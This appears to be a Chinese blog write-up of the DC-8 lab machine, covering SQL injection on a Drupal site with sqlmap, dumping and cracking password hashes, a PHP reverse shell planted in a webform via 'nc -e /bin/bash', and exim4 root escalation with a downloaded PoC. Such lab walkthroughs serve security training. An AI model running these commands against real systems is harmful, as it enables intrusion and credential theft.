DC-8靶机渗透测试

DC-8靶机

信息收集

1.nmap扫描出主机IP为192.168.78.156 开放80和22端口,没扫出来什么漏洞,但是发现robots.txt文件,给出了后台登录地址/usr/login
在这里插入图片描述

web渗透

1.登陆到主页发现是drupal框架,使用nmap也没扫出来什么,通过点击不同的页面,似乎发现了SQL注入的地方,点击下面的小标签返回了nid=2

image-20230627214823633

image-20230627214830891

2.使用手工测试一下是否存在注入点,输入’返回了mysql数据库的错误,发现有

image-20230627214941100

3.接下来测试是字符注入还是数字型注入,'#和 and 1=1,确定是数字型注入

image-20230627215027450

image-20230627215033967

4.使用SQLmap对注入点进行进行注入攻击测试`

python sqlmap.py -u http://192.168.78.156/?nid=2 -dbms mysql -batch -dbs

image-20230627223428566

5.进行继续获取表,数据,直到读取了账号和密码paylaod为

python sqlmap.py -u http://192.168.78.156/?nid=2 -dbms mysql -batch -D d7db -T users -C name,pass -dump
admin  $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z 
john   $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

image-20230627223514533

6.很明显提示出了使用john进行密码破解,将密码保存到文件中,使用john破解hash得到相应的账密 john / turtle

image-20230627220058010

7.尝试进行ssh登录发现失败,去访问/usr/login页面,输入获得的账密登录到后台

获取权限

1.来到后台目录,尝试找到可以修改页面代码的功能,而且还能解析php的功能
2.根据尝试,找到提交反馈意见的界面,输入信息提交之后会显示提示语,而且该模块能自己编写提示语,还能写入php语言
3.在该界面,点击edit,找到WEBFORM处可以编辑并执行PHP代码

image-20230627223633134

4.直接在界面写入反弹shell的php代码

<?php
system("nc -e /bin/bash 192.168.78.145 7777");
?> 

image-20230627223742749

5.将提交重定向行Confirmation page(确认页面)给勾上,然后滑下点保存,继续来到contact界面,联系随便填入联系表单,点击发送,触发PHP代码

image-20230627223934562

6.来到kali主机上,查看监听的本地端口已经反弹回来了shell

image-20230627223856300

权限提升

1.进入到shell尝试很多方法,寻找home目录文件有无信息,sudo -l有没有提权,/etc/passwd和/etc/sudoers的权限,查看了密码文件查看用户只有dc8user
2.使用suid提前尝试一下

find / -user root -perm -4000 -print 2>/dev/null

image-20230627222912476

3.发现了老朋友exim4,前面就利用这个漏洞成功提过权,直接wget进行下载POC。一开始下载失败,发现是权限不够,应该是目录的问题,来到tmp文件下。

image-20230627223008979

4.一开始直接执行发现提权失败,使用./1.sh -m netcat命令发现才可以提权,使用id查看成功提权到了root

image-20230627223117448

5.进行读取flag文件,但是读取没一会发现权限就掉回去了,不太稳定捏

image-20230627223250935

靶机总结

  1. 本次靶机的关键点就在于web界面的SQL注入能否发现了
  2. 多尝试点击点击页面,查看url数据可能会发现SQL注入的注入点
  3. 测试注入点成功,可以直接使用sqlmap进行注入点攻击
  4. john 破解 hash密码
  5. drupal的网站后台来到contact的WEBFORM功能可以写入php代码进行反弹shell的操作
  6. 提权方式还是依旧的几种,本次的exim4提权,需要使用提权代码 ./1.sh -m netcat,增加了一个参数
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值